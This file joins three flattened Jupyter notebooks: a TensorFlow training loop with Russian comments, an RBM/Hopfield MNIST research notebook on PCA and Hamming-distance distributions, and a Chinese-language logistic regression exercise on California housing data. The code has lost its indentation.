# opt = tf.optimizers.Adam(learning_rate=0.1)
# + pycharm={"name": "#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n"}
# Готовим обучение
BATCH_SIZE = 32
EPOCHS = 10
TOTAL = x_train.shape[0]
print(TOTAL) # Количество штук в обучающей выборке
# + pycharm={"name": "#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n"}
# tf.data.Dataset - это класс с набором обучающих данных.
# Его можно создать из списков питона методом from_tensor_slices
# можно из файлов dataset = tf.data.TextLineDataset(["file1.txt", "file2.txt"])
# подробнее https://www.tensorflow.org/api_docs/python/tf/data/Dataset
train_dataset = tf.data.Dataset.from_tensor_slices((x_train, y_train))
# Перемешиваем выборкии разбиваеи на батчи
train_dataset = train_dataset.shuffle(buffer_size=1024).batch(BATCH_SIZE)
# + pycharm={"name": "#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n"}
print(train_dataset)
# + pycharm={"name": "#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n"}
# Цикл обучения
for n in range(EPOCHS):
loss = 0
for x_batch, y_batch in train_dataset:
with tf.GradientTape() as tape:
f_loss = cross_entropy(y_batch, model_predict(x_batch))
loss += f_loss
grads = tape.gradient(f_loss, [layer_1.trainable_variables, layer_2.trainable_variables])
opt.apply_gradients(zip(grads[0], layer_1.trainable_variables))
opt.apply_gradients(zip(grads[1], layer_2.trainable_variables))
print(loss.numpy())
# + pycharm={"name": "#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n"}
y = model_predict(x_test)
y2 = tf.argmax(y, axis=1).numpy()
acc = len(y_test[y_test == y2]) / y_test.shape[0] * 100
print(acc)
# + pycharm={"name": "#%%\n"}
| lab_2/1st_part/tf_test.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import matplotlib.pyplot as plt
import numpy as np
from os import sep
from settings import DIR_DATA, DIR_OUTPUT, DIR_MODELS
from plotting import image_fancy
# -
# # Nov 10 - Build and save PCA on dataset
# +
import matplotlib.pyplot as plt
import numpy as np
from sklearn.decomposition import PCA
from data_process import data_mnist, binarize_image_data, image_data_collapse
from settings import MNIST_BINARIZATION_CUTOFF
TRAINING, TESTING = data_mnist(binarize=True)
num_features = TRAINING[0][0].shape[0] ** 2
num_samples = len(TRAINING)
def PCA_on_dataset(num_samples, num_features, dataset=None, binarize=True, X=None):
def get_X(dataset):
X = np.zeros((len(dataset), num_features))
for idx, pair in enumerate(dataset):
elem_arr, elem_label = pair
preprocessed_input = image_data_collapse(elem_arr)
#if binarize:
# preprocessed_input = binarize_image_data(preprocessed_input, threshold=MNIST_BINARIZATION_CUTOFF)
features = preprocessed_input
X[idx, :] = features
return X
if X is None:
X = get_X(dataset)
pca = PCA(n_components=None, svd_solver='full')
pca.fit(X)
return pca
# -
pca = PCA_on_dataset(num_samples, num_features, dataset=TRAINING)
pca_weights = pca.components_ # each ROW of the pca weights is like a pattern
# SAVE (transposed version)
fpath = DIR_MODELS + sep + 'pca_binarized_raw.npz'
np.savez(fpath, pca_weights=pca_weights.T)
# LOAD
with open(fpath, 'rb') as f:
pca_weights = np.load(fpath)['pca_weights']
print(pca_weights)
print(pca_weights.shape)
for idx in range(2):
plt.imshow(pca_weights[:, idx].reshape(28,28))
plt.show()
a = pca_weights.reshape(28,28,-1)
print(pca_weights.shape)
print(a.shape)
for idx in range(2):
plt.imshow(a[:, :, idx])
plt.show()
# +
from RBM_train import load_rbm_hopfield
k_pattern = 12
fname = 'hopfield_mnist_%d0_PCA.npz' % k_pattern
rbm = load_rbm_hopfield(npzpath=DIR_MODELS + os.sep + 'saved' + os.sep + fname)
# -
rbm_weights = rbm.internal_weights
print(rbm_weights.shape)
for idx in range(2):
plt.imshow(rbm_weights[:, idx].reshape(28,28))
plt.show()
# # Nov 13 - For each digit (so 10x) Build and save PCA on dataset
# +
from data_process import data_dict_mnist
# data_dict has the form:
# data_dict[0] = 28 x 28 x n0 of n0 '0' samples
# data_dict[4] = 28 x 28 x n4 of n4 '4' samples
data_dict, category_counts = data_dict_mnist(TRAINING)
for idx in range(10):
X = data_dict[idx].reshape((28**2, -1)).transpose()
print(X.shape)
num_samples = X.shape[0]
num_features = X.shape[1]
pca = PCA_on_dataset(num_samples, num_features, dataset=None, binarize=True, X=X)
pca_weights = pca.components_ # each ROW of the pca weights is like a pattern
# SAVE (transposed version)
fpath = DIR_MODELS + sep + 'pca_binarized_raw_digit%d.npz' % idx
np.savez(fpath, pca_weights=pca_weights.T)
# +
# LOAD
fpath = DIR_MODELS + sep + 'pca_binarized_raw_digit7.npz'
with open(fpath, 'rb') as f:
pca_weights = np.load(fpath)['pca_weights']
print(pca_weights)
print(pca_weights.shape)
for idx in range(2):
plt.imshow(pca_weights[:, idx].reshape(28,28))
plt.colorbar()
plt.show()
a = pca_weights.reshape(28,28,-1)
print(pca_weights.shape)
print(a.shape)
for idx in range(2):
plt.imshow(a[:, :, idx])
plt.show()
# -
# # Inspect models/poe npz files
DIR_POE = 'models' + sep + 'poe'
fpath = DIR_POE + sep + 'hopfield_digit3_p1000_1000_pca.npz'
with open(fpath, 'rb') as f:
fcontents = np.load(fpath)
print(fcontents.files)
weights = fcontents['Q']
for idx in range(3):
plt.imshow(weights[:, idx].reshape(28, 28))
plt.show()
# # Nov 15 - Distribution of images in the dataset
# +
from data_process import data_dict_mnist
from RBM_train import load_rbm_hopfield
# data_dict has the form:
# data_dict[0] = 28 x 28 x n0 of n0 '0' samples
# data_dict[4] = 28 x 28 x n4 of n4 '4' samples
data_dict, category_counts = data_dict_mnist(TRAINING)
# -
# load 10 target patterns
k_choice = 1
p = k_choice * 10
N = 28**2
fname = 'hopfield_mnist_%d0%s.npz' % (k_choice, '_hebbian')
rbm_hebbian = load_rbm_hopfield(npzpath='models' + sep + 'saved' + sep + fname)
weights_hebbian = rbm_hebbian.internal_weights
XI = weights_hebbian
PATTERNS = weights_hebbian * np.sqrt(N)
for mu in range(p):
pattern_mu = PATTERNS[:, mu] * np.sqrt(N)
#plt.figure(figsize=(2,12))
plt.imshow(pattern_mu.reshape(28,28), interpolation='None')
plt.colorbar()
plt.show()
# +
# PLAN: for each class
# 1) look at all data from the class
# 2) look at hamming distance of each digit from the class (max 28^2=784)
# 3) ...
def hamming_distance(x, y):
prod = x * y
dist = 0.5 * np.sum(1 - prod)
return dist
def build_Jij(patterns):
# TODO remove self-interactions? no RBM has them
A = np.dot(patterns.T, patterns)
A_inv = np.linalg.inv(A)
Jij = np.dot(patterns,
np.dot(A_inv, patterns.T))
return Jij
J_INTXN = build_Jij(PATTERNS)
def energy_fn(state_vector):
scaled_energy = -0.5 * np.dot(state_vector,
np.dot(J_INTXN, state_vector))
return scaled_energy
def get_hamming_histogram(X, target_state):
# given matrix of states, compute distance to the target state for all
# plot the histogram
if len(X.shape) == 3:
assert X.shape[0] == 28 and X.shape[1] == 28
X = X.reshape(28**2, -1)
num_pts = X.shape[-1]
dists = np.zeros(num_pts)
for idx in range(num_pts):
dists[idx] = hamming_distance(X[:, idx], target_state)
return dists
def get_energy_histogram(X, target_state):
# given matrix of states, compute distance to the target state for all
# plot the histogram
if len(X.shape) == 3:
assert X.shape[0] == 28 and X.shape[1] == 28
X = X.reshape(28**2, -1)
num_pts = X.shape[-1]
energies = np.zeros(num_pts)
for idx in range(num_pts):
energies[idx] = energy_fn(X[:, idx])
return energies
# -
# Gather data
# +
#for idx in range(10):
list_of_dists = []
list_of_energies = []
BETA = 2.0
# pick get_hamming_histogram OR get_energy_histogram
hist_fn = get_energy_histogram
for mu in range(p):
target_state = PATTERNS[:, mu]
dists_mu = get_hamming_histogram(data_dict[mu], target_state)
print('class %d: min dist = %d, max dist = %d' % (mu, min(dists_mu), max(dists_mu)))
list_of_dists.append(dists_mu)
energies_mu = get_energy_histogram(data_dict[mu], target_state)
list_of_energies.append(energies_mu)
#boltz_mu = np.exp(- BETA * energies_mu)
#list_of_boltz.append(boltz_mu)
# -
# Plot data
# +
outdir = 'output' + sep + 'ICLR_nb'
D_RANGE = (0,250)
E_RANGE = (-0.5 * 28**2, -100)
#B_RANGE =
for mu in range(p):
dists_by_mu = list_of_dists[mu]
energies_by_mu = list_of_energies[mu]
#boltz_by_mu = list_of_boltz[mu]
n, bins, _ = plt.hist(dists_by_mu, range=D_RANGE, bins=50, density=True)
plt.title('hamming distances (pattern: %d)' % mu)
plt.savefig(outdir + sep + 'dist_hist_mu%d.jpg' % mu)
plt.close()
plt.hist(energies_by_mu, range=E_RANGE, bins=50, density=True)
plt.title('energies (pattern: %d)' % mu)
plt.axvline(x=-0.5 * 28**2)
plt.savefig(outdir + sep + 'energy_hist_mu%d.jpg' % mu)
plt.close()
scale_factors = np.array([rescaler(i) for i in bins[:-1]])
counts, bins = np.histogram(dists_by_mu, bins=50)
plt.hist(bins[:-1], bins, weights=scale_factors * counts)
#plt.hist(dists_by_mu, range=E_RANGE, bins=bins, density=True, weights=scale_factors)
plt.title('scaled dists (pattern: %d)' % mu)
#plt.axvline(x=-0.5 * 28**2)
plt.savefig(outdir + sep + 'scaled_dists_hist_mu%d.jpg' % mu)
plt.close()
#plt.hist(boltz_by_mu, bins=50, density=True)
#plt.title('boltzmann weights (pattern: %d)' % mu)
#plt.savefig(outdir + sep + 'boltz_hist_mu%d.jpg' % mu)
#plt.close()
# +
idx_a = 7
idx_b = 12
print(data_dict[1].shape)
x1 = data_dict[1][:,:,idx_a].reshape(28**2)
x2 = data_dict[1][:,:,idx_b].reshape(28**2)
plt.imshow(data_dict[1][:,:,idx_a])
plt.show()
plt.imshow(data_dict[1][:,:,idx_b])
plt.show()
hd = np.sum(1 - x1 * x2) * 0.5
print(hd)
# -
# # (Nov 16, 2020) Distance distribution rescaled by hamming shell area
# Want to rescale the observed data distance distibution by the 'volume' of states in 2^N space
# The number of states a distance d away from a given state is:
# $\displaystyle n(d) = {N \choose d}$
# e.g. $n(0)=1, n(1)=N=784, n(2)=N(N-1)/2 = 306936, ... , n(N)=1$.
#
# Note that: $n!=\Gamma(n+1)$
#
# The (uniform) probability to be a distance $d$ away is then: $p(d) = 2^{-N} n(d)$
# +
N0 = 28**2
from scipy.special import gamma, loggamma
def N_choose_k(N, k):
num = gamma(N+1)
den = gamma(N - k + 1) * gamma(k+1)
return num / den
def log_uniform_dist_prob(d, N=N0):
scale = -N *np.log(2)
num = loggamma(N+1)
den = loggamma(N - d + 1) + loggamma(d+1)
return scale + num - den
print('Example probabilities (log, direct):')
p0 = log_uniform_dist_prob(0, N=784)
p1 = log_uniform_dist_prob(1, N=784)
p2 = log_uniform_dist_prob(2, N=784)
print('d=0', p0, np.exp(p0))
print('d=1', p1, np.exp(p1))
print('d=2', p2, np.exp(p2))
d_arr = np.arange(N+1)
p_arr = log_uniform_dist_prob(d_arr)
plt.plot(d_arr, p_arr)
plt.xlabel(r'$\textrm{distance}$')
plt.ylabel(r'$\log p(d)$')
d_arr = np.arange(N+1)
logp_arr = log_uniform_dist_prob(d_arr)
plt.plot(d_arr, logp_arr)
plt.xlabel(r'$\textrm{distance}$')
plt.ylabel(r'$\log p(d)$')
plt.show(); plt.close()
d_arr = np.arange(0,N+1)
p_arr = np.exp(log_uniform_dist_prob(d_arr))
plt.plot(d_arr, p_arr)
plt.xlabel(r'$\textrm{distance}$')
plt.ylabel(r'$p(d)$')
plt.show(); plt.close()
# -
# We observe some data distribution $p_{data}^{(\mu)}(d)=$ "probability that sample $\mu$-images are a distance $d$ from pattern $\mu$". Here is $\log p(d)$ for $\mu=1$.
for mu in [1]:
dists_by_mu = list_of_dists[mu]
energies_by_mu = list_of_energies[mu]
#boltz_by_mu = list_of_boltz[mu]
n, bins, _ = plt.hist(dists_by_mu, range=(0,250), bins=50, density=True)
plt.title('hamming distances (pattern: %d)' % mu)
plt.show(); plt.close()
# Consider rescaling this observed distribution by $p(d)$, the unbiased probability of being a distance $d$ away.
#
# Define $g_{data}^{(\mu)}(d) \equiv p_{data}^{(\mu)}(d) / p(d)$.
#
# For re-weighting the binning, we need to sum over all the distances in each bin. For example, suppose bin $i$ represents distance $0, 1, 2$. The "volume" of states is then:
#
# $v(b_i) = n(0) + n(1) + n(2)$
#
# Then for the corresponding $p(d)$ bin $b_i$,
#
# $g_{data}^{(\mu)}(b_i) \equiv 2^N p_{data}^{(\mu)}(b_i) / (n(0) + n(1) + n(2))$
#
# And its $\log$,
#
# $\log g_{data}^{(\mu)}(b_i) \equiv N \log 2 + \log p_{data}^{(\mu)}(b_i) - \log (n(0) + n(1) + n(2))$
#
# The final term is the $\log$ of a partial sum of binomial coefficients, which has no closed form.
# Indirectly discussed on p102 of https://www.math.upenn.edu/~wilf/AeqB.pdf. Bottom of p160 is our quantity of interest. Relevant links
#
# - https://mathoverflow.net/questions/17202/sum-of-the-first-k-binomial-coefficients-for-fixed-n
# - https://math.stackexchange.com/questions/103280/asymptotics-for-a-partial-sum-of-binomial-coefficients
# - https://mathoverflow.net/questions/261428/approximation-of-sum-of-the-first-binomial-coefficients-for-fixed-n?noredirect=1&lq=1
#
# I will try the upper and lower bounds from the last link.
# +
outdir = 'output' + sep + 'ICLR_nb'
D_RANGE = (0,250)
E_RANGE = (-0.5 * 28**2, -100)
def build_bins(dmin, dmax, nn):
# return nn+1 bin edges, for the nn bins
gap = (dmax - dmin) / float(nn)
return np.arange(dmin, dmax + 1e-5, gap)
def H_fn(x):
return -x * np.log2(x) - (1-x) * np.log2(1-x)
def log_volume_per_bin(bins, upper=True):
# NOTE: bounds only works for d <= N/2
# assumes the right edge of each bin is inclusive (i.e. [0, 10] means [0, 10+eps])
# TODO care for logs, at initial writing it is NOT log
nn = len(bins) - 1
def upper_bound(r):
# partial sum of binomial coefficients (N choose k) form k=0 to k=r
# see https://mathoverflow.net/questions/261428/approximation-of-sum-of-the-first-binomial-coefficients-for-fixed-n?noredirect=1&lq=1
# see also Michael Lugo: https://mathoverflow.net/questions/17202/sum-of-the-first-k-binomial-coefficients-for-fixed-n
x = r / float(N0)
return 2 ** (N0 * H_fn(x))
def lower_bound(r):
num = upper_bound(r)
den = np.sqrt(8 * r * (1 - float(r) / N0))
return num/den
if upper:
bound = upper_bound
else:
bound = lower_bound
approx_cumsum = np.zeros(nn)
approx_vol_per_bin = np.zeros(nn)
for idx in range(nn):
bin_left = int(bins[idx])
bin_right = int(bins[idx + 1])
approx_cumsum[idx] = bound(bin_right)
approx_vol_per_bin[0] = approx_cumsum[0]
for idx in range(1, nn):
approx_vol_per_bin[idx] = approx_cumsum[idx] - approx_cumsum[idx-1]
log_approx_volume_per_bin = np.log(approx_vol_per_bin)
return log_approx_volume_per_bin
NUM_BINS = 25
assert (D_RANGE[1] - D_RANGE[0]) % NUM_BINS == 0
GAP = (D_RANGE[1] - D_RANGE[0]) / NUM_BINS
BINS = build_bins(D_RANGE[0], D_RANGE[1], NUM_BINS)
BINS_MIDPTS = [0.5*(BINS[idx + 1] + BINS[idx]) for idx in range(NUM_BINS)]
print(BINS)
# scale the normed counts by the distance
approxUpper_log_vol_per_bin_arr = log_volume_per_bin(BINS, upper=True)
approxLower_log_vol_per_bin_arr = log_volume_per_bin(BINS, upper=False)
for mu in range(p):
counts, bins = np.histogram(list_of_dists[mu], bins=BINS)
# Plot p_data(d)
normed_counts, _, _ = plt.hist(bins[:-1], bins, weights=counts, density=True)
plt.title(r'$p_{data}(d)$ (pattern: %d)' % mu)
plt.xlim(D_RANGE[0], D_RANGE[1])
plt.xlabel(r'$\textrm{Hamming distance, d}$')
plt.savefig(outdir + sep + 'normed_dists_hist_mu%d.jpg' % mu)
plt.close()
# Plot log p_data(d)
log_normed_counts, _, _ = plt.hist(bins[:-1], bins, weights=counts, density=True, log=True)
plt.title(r'$\log p_{data}(d)$ (pattern: %d)' % mu)
plt.xlim(D_RANGE[0], D_RANGE[1])
plt.xlabel(r'$\textrm{Hamming distance, d}$')
plt.savefig(outdir + sep + 'log_normed_dists_hist_mu%d.jpg' % mu)
plt.close()
#scaled_log_normed_counts = ...
print(len(normed_counts), normed_counts.shape)
print(len(bins[:-1]), bins.shape)
scaled_appxUpper_log_normed_counts = N0 * np.log(2) + np.log(normed_counts) - approxUpper_log_vol_per_bin_arr
scaled_appxLower_log_normed_counts = N0 * np.log(2) + np.log(normed_counts) - approxLower_log_vol_per_bin_arr
# Plot log g_data(d), upper and lower bound versions
plt.bar(BINS_MIDPTS, scaled_appxUpper_log_normed_counts, color='#2A63B1', width=GAP)
plt.title(r'$\log g_{data}(d)$ (upper; pattern: %d)' % mu)
plt.xlim(D_RANGE[0], D_RANGE[1])
plt.xlabel(r'$\textrm{Hamming distance, d}$')
plt.savefig(outdir + sep + 'scaled_appxUpper_log_normed_dists_hist_mu%d.jpg' % mu)
plt.close()
plt.bar(BINS_MIDPTS, scaled_appxLower_log_normed_counts, color='#2A63B1', width=GAP)
plt.title(r'$\log g_{data}(d)$ (lower; pattern: %d)' % mu)
plt.xlim(D_RANGE[0], D_RANGE[1])
plt.xlabel(r'$\textrm{Hamming distance, d}$')
plt.savefig(outdir + sep + 'scaled_appxLower_log_normed_dists_hist_mu%d.jpg' % mu)
plt.close()
# -
# troubleshooting NaN: do the whole N range of 0 to 784 split into 28size bins
#
# Have function which computes for each distance the average volume / log volume (more stable). Can bin later.
# +
N = 28**2
D_RANGE = (0,N)
NUM_BINS = N + 1 # 28
if NUM_BINS == N+1:
GAP = 1
BINS = np.arange(NUM_BINS)
BINS_MIDPTS = [0.5*(BINS[idx + 1] + BINS[idx]) for idx in range(NUM_BINS-1)]
else:
assert (D_RANGE[1] - D_RANGE[0]) % NUM_BINS == 0
GAP = (D_RANGE[1] - D_RANGE[0]) / NUM_BINS
BINS = build_bins(D_RANGE[0], D_RANGE[1], NUM_BINS)
BINS_MIDPTS = [0.5*(BINS[idx + 1] + BINS[idx]) for idx in range(NUM_BINS)]
#print(BINS)
def log_volume_per_dist(dists, upper=True):
assert len(dists) == N + 1
nn = len(dists)
def upper_bound(r):
x = r / float(N0)
return 2 ** (N0 * H_fn(x))
def lower_bound(r):
num = upper_bound(r)
den = np.sqrt(8 * r * (1 - float(r) / N0))
return num/den
if upper:
bound = upper_bound
else:
bound = lower_bound
approx_cumsum = np.zeros(nn)
approx_vol_per_dist = np.zeros(nn)
# know first/last value is "1"
approx_cumsum[0] = 1
approx_cumsum[N] = 2**N
# use symmetry wrt midpoint N/2.0
assert N % 2 == 0
midpt = int(N / 2)
for idx in range(1, midpt + 1):
idx_reflect = N - idx
approx_cumsum[idx] = bound(idx)
approx_cumsum[idx_reflect] = approx_cumsum[N] - approx_cumsum[idx]
#print('loop1_cumsum', idx, approx_cumsum[idx], idx_reflect, approx_cumsum[idx_reflect])
approx_vol_per_dist[0] = approx_cumsum[0]
approx_vol_per_dist[N] = 1.0
for idx in range(1, midpt + 1):
idx_reflect = N - idx
approx_vol_per_dist[idx] = approx_cumsum[idx] - approx_cumsum[idx-1]
approx_vol_per_dist[idx_reflect] = approx_vol_per_dist[idx]
#print('log_volume_per_dist', idx, idx_reflect, approx_vol_per_dist[idx], approx_vol_per_dist[idx])
log_approx_volume_per_dist = np.log(approx_vol_per_dist)
#print('log_approx_volume_per_dist')
#print(log_approx_volume_per_dist)
return log_approx_volume_per_dist, approx_vol_per_dist, approx_cumsum
def log_volume_per_bin(bins):
nn = len(bins) - 1
def upper_bound(r):
x = r / float(N0)
return 2 ** (N0 * H_fn(x))
bound = upper_bound
approx_cumsum = np.zeros(nn)
approx_vol_per_bin = np.zeros(nn)
for idx in range(nn):
bin_left = int(bins[idx])
bin_right = int(bins[idx + 1])
approx_cumsum[idx] = bound(bin_right)
print('loop1_cumsum', idx, bin_right, approx_cumsum[idx])
approx_vol_per_bin[0] = approx_cumsum[0]
for idx in range(1, nn):
approx_vol_per_bin[idx] = approx_cumsum[idx] - approx_cumsum[idx-1]
print('log_volume_per_bin', idx, approx_vol_per_bin[idx], approx_cumsum[idx])
log_approx_volume_per_bin = np.log(approx_vol_per_bin)
print('log_approx_volume_per_bin')
print(log_approx_volume_per_bin)
return log_approx_volume_per_bin
# scale the normed counts by the distance
if NUM_BINS == N + 1:
approxUpper_log_vol_per_bin_arr, approx_vol_per_dist, approx_cumsum = log_volume_per_dist(BINS, upper=True)
approxLower_log_vol_per_bin_arr, approx_vol_per_dist, approx_cumsum = log_volume_per_dist(BINS, upper=False)
else:
approxUpper_log_vol_per_bin_arr - log_volume_per_bin(BINS)
for mu in [1]:
counts, bins = np.histogram(list_of_dists[mu], bins=np.arange(N+2)) # len error extend bins
print('len(counts), len(bins)')
print(len(counts), len(bins))
normed_counts, _, _ = plt.hist(bins[:-1], bins, weights=counts, density=True)
plt.close()
# Plot p_data(d)
plt.bar(BINS, normed_counts, color='red', width=0.8, linewidth=0)
plt.title(r'$p_{data}(d)$ (pattern: %d)' % mu)
plt.xlim(D_RANGE[0], D_RANGE[1])
plt.xlabel(r'$\textrm{Hamming distance, d}$')
plt.savefig(outdir + sep + 'TEST_p_dists_hist_mu%d.pdf' % mu)
plt.close()
# Plot log p_data(d)
plt.bar(BINS, np.log(normed_counts), color='red', width=0.8, linewidth=0)
plt.title(r'$\log p_{data}(d)$ (pattern: %d)' % mu)
plt.xlim(D_RANGE[0], D_RANGE[1])
plt.xlabel(r'$\textrm{Hamming distance, d}$')
plt.savefig(outdir + sep + 'TEST_logp_dists_hist_mu%d.pdf' % mu)
plt.close()
#scaled_log_normed_counts = ...
print(len(normed_counts), normed_counts.shape)
print(len(bins[:-1]), bins.shape)
scaled_appxUpper_log_normed_counts = N0 * np.log(2) + np.log(normed_counts) - approxUpper_log_vol_per_bin_arr
scaled_appxLower_log_normed_counts = N0 * np.log(2) + np.log(normed_counts) - approxLower_log_vol_per_bin_arr
print('bins_right')
print(bins[1:])
print('normed_counts')
print(normed_counts)
print('approxUpper_log_vol_per_bin_arr')
print(approxUpper_log_vol_per_bin_arr)
print('scaled_appxUpper_log_normed_counts')
print(scaled_appxUpper_log_normed_counts)
# Plot log g_data(d), upper and lower bound versions
plt.bar(BINS, scaled_appxUpper_log_normed_counts, color='#2A63B1', width=0.8, linewidth=0)
plt.title(r'$\log g_{data}(d)$ (upper; pattern: %d)' % mu)
#plt.xlim(D_RANGE[0], D_RANGE[1])
plt.xlim(0,100)
plt.xlabel(r'$\textrm{Hamming distance, d}$')
plt.savefig(outdir + sep + 'TEST_scaled_appxUpper_log_normed_dists_hist_mu%d.pdf' % mu)
plt.close()
plt.bar(BINS, scaled_appxLower_log_normed_counts, color='#2A63B1', width=0.8, linewidth=0)
plt.title(r'$\log g_{data}(d)$ (upper; pattern: %d)' % mu)
plt.xlim(D_RANGE[0], D_RANGE[1])
plt.xlabel(r'$\textrm{Hamming distance, d}$')
plt.savefig(outdir + sep + 'TEST_scaled_appxLower_log_normed_dists_hist_mu%d.pdf' % mu)
plt.close()
plt.bar(BINS, np.exp(scaled_appxLower_log_normed_counts), color='green', width=0.8, linewidth=0)
plt.title(r'$\log g_{data}(d)$ (upper; pattern: %d)' % mu)
plt.xlim(D_RANGE[0], D_RANGE[1])
plt.xlabel(r'$\textrm{Hamming distance, d}$')
plt.savefig(outdir + sep + 'TEST_scaled_appxLower_normed_dists_hist_mu%d.pdf' % mu)
plt.close()
# +
plt.plot(range(784+1), approxUpper_log_vol_per_bin_arr - N*np.log(2))
plt.show(); plt.close()
plt.plot(range(784+1), N*np.log(2) - approxUpper_log_vol_per_bin_arr)
plt.show(); plt.close()
# -
print(counts)
# +
a = np.array([[1,3,4],[1,3,4]])
scales = np.array([2,1,2])
print (a / scales)
# -
print(scales > 1)
| RBM/misc.ipynb |
# + [markdown] colab_type="text" id="copyright-notice"
# #### Copyright 2017 Google LLC.
# + cellView="both" colab={} colab_type="code" id="copyright-notice2"
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# + [markdown] colab_type="text" id="g4T-_IsVbweU"
# # 逻辑回归
# + [markdown] colab_type="text" id="LEAHZv4rIYHX"
# **学习目标:**
# * 将(在之前的练习中构建的)房屋价值中位数预测模型重新构建为二元分类模型
# * 比较逻辑回归与线性回归解决二元分类问题的有效性
# + [markdown] colab_type="text" id="CnkCZqdIIYHY"
# 与在之前的练习中一样,我们将使用加利福尼亚州住房数据集,但这次我们会预测某个城市街区的住房成本是否高昂,从而将其转换成一个二元分类问题。此外,我们还会暂时恢复使用默认特征。
# + [markdown] colab_type="text" id="9pltCyy2K3dd"
# ## 将问题构建为二元分类问题
#
# 数据集的目标是 `median_house_value`,它是一个数值(连续值)特征。我们可以通过向此连续值使用阈值来创建一个布尔值标签。
#
# 我们希望通过某个城市街区的特征预测该街区的住房成本是否高昂。为了给训练数据和评估数据准备目标,我们针对房屋价值中位数定义了分类阈值 - 第 75 百分位数(约为 265000)。所有高于此阈值的房屋价值标记为 `1`,其他值标记为 `0`。
# + [markdown] colab_type="text" id="67IJwZX1Vvjt"
# ## 设置
#
# 运行以下单元格,以加载数据并准备输入特征和目标。
# + colab={} colab_type="code" id="fOlbcJ4EIYHd"
from __future__ import print_function
import math
from IPython import display
from matplotlib import cm
from matplotlib import gridspec
from matplotlib import pyplot as plt
import numpy as np
import pandas as pd
from sklearn import metrics
import tensorflow as tf
from tensorflow.python.data import Dataset
tf.logging.set_verbosity(tf.logging.ERROR)
pd.options.display.max_rows = 10
pd.options.display.float_format = '{:.1f}'.format
california_housing_dataframe = pd.read_csv("https://download.mlcc.google.cn/mledu-datasets/california_housing_train.csv", sep=",")
california_housing_dataframe = california_housing_dataframe.reindex(
np.random.permutation(california_housing_dataframe.index))
# + [markdown] colab_type="text" id="lTB73MNeIYHf"
# 注意以下代码与之前练习中的代码之间稍有不同。我们并没有将 `median_house_value` 用作目标,而是创建了一个新的二元目标 `median_house_value_is_high`。
# + colab={} colab_type="code" id="kPSqspaqIYHg"
def preprocess_features(california_housing_dataframe):
"""Prepares input features from California housing data set.
Args:
california_housing_dataframe: A Pandas DataFrame expected to contain data
from the California housing data set.
Returns:
A DataFrame that contains the features to be used for the model, including
synthetic features.
"""
selected_features = california_housing_dataframe[
["latitude",
"longitude",
"housing_median_age",
"total_rooms",
"total_bedrooms",
"population",
"households",
"median_income"]]
processed_features = selected_features.copy()
# Create a synthetic feature.
processed_features["rooms_per_person"] = (
california_housing_dataframe["total_rooms"] /
california_housing_dataframe["population"])
return processed_features
def preprocess_targets(california_housing_dataframe):
"""Prepares target features (i.e., labels) from California housing data set.
Args:
california_housing_dataframe: A Pandas DataFrame expected to contain data
from the California housing data set.
Returns:
A DataFrame that contains the target feature.
"""
output_targets = pd.DataFrame()
# Create a boolean categorical feature representing whether the
# median_house_value is above a set threshold.
output_targets["median_house_value_is_high"] = (
california_housing_dataframe["median_house_value"] > 265000).astype(float)
return output_targets
# + colab={} colab_type="code" id="FwOYWmXqWA6D"
# Choose the first 12000 (out of 17000) examples for training.
training_examples = preprocess_features(california_housing_dataframe.head(12000))
training_targets = preprocess_targets(california_housing_dataframe.head(12000))
# Choose the last 5000 (out of 17000) examples for validation.
validation_examples = preprocess_features(california_housing_dataframe.tail(5000))
validation_targets = preprocess_targets(california_housing_dataframe.tail(5000))
# Double-check that we've done the right thing.
print("Training examples summary:")
display.display(training_examples.describe())
print("Validation examples summary:")
display.display(validation_examples.describe())
print("Training targets summary:")
display.display(training_targets.describe())
print("Validation targets summary:")
display.display(validation_targets.describe())
# + [markdown] colab_type="text" id="uon1LB3A31VN"
# ## 线性回归会有怎样的表现?
# 为了解逻辑回归为什么有效,我们首先训练一个使用线性回归的简单模型。该模型将使用 `{0, 1}` 中的值为标签,并尝试预测一个尽可能接近 `0` 或 `1` 的连续值。此外,我们希望将输出解读为概率,所以最好模型的输出值可以位于 `(0, 1)` 范围内。然后我们会应用阈值 `0.5`,以确定标签。
#
# 运行以下单元格,以使用 [LinearRegressor](https://www.tensorflow.org/api_docs/python/tf/estimator/LinearRegressor) 训练线性回归模型。
# + colab={} colab_type="code" id="smmUYRDtWOV_"
def construct_feature_columns(input_features):
"""Construct the TensorFlow Feature Columns.
Args:
input_features: The names of the numerical input features to use.
Returns:
A set of feature columns
"""
return set([tf.feature_column.numeric_column(my_feature)
for my_feature in input_features])
# + colab={} colab_type="code" id="B5OwSrr1yIKD"
def my_input_fn(features, targets, batch_size=1, shuffle=True, num_epochs=None):
"""Trains a linear regression model.
Args:
features: pandas DataFrame of features
targets: pandas DataFrame of targets
batch_size: Size of batches to be passed to the model
shuffle: True or False. Whether to shuffle the data.
num_epochs: Number of epochs for which data should be repeated. None = repeat indefinitely
Returns:
Tuple of (features, labels) for next data batch
"""
# Convert pandas data into a dict of np arrays.
features = {key:np.array(value) for key,value in dict(features).items()}
# Construct a dataset, and configure batching/repeating.
ds = Dataset.from_tensor_slices((features,targets)) # warning: 2GB limit
ds = ds.batch(batch_size).repeat(num_epochs)
# Shuffle the data, if specified.
if shuffle:
ds = ds.shuffle(10000)
# Return the next batch of data.
features, labels = ds.make_one_shot_iterator().get_next()
return features, labels
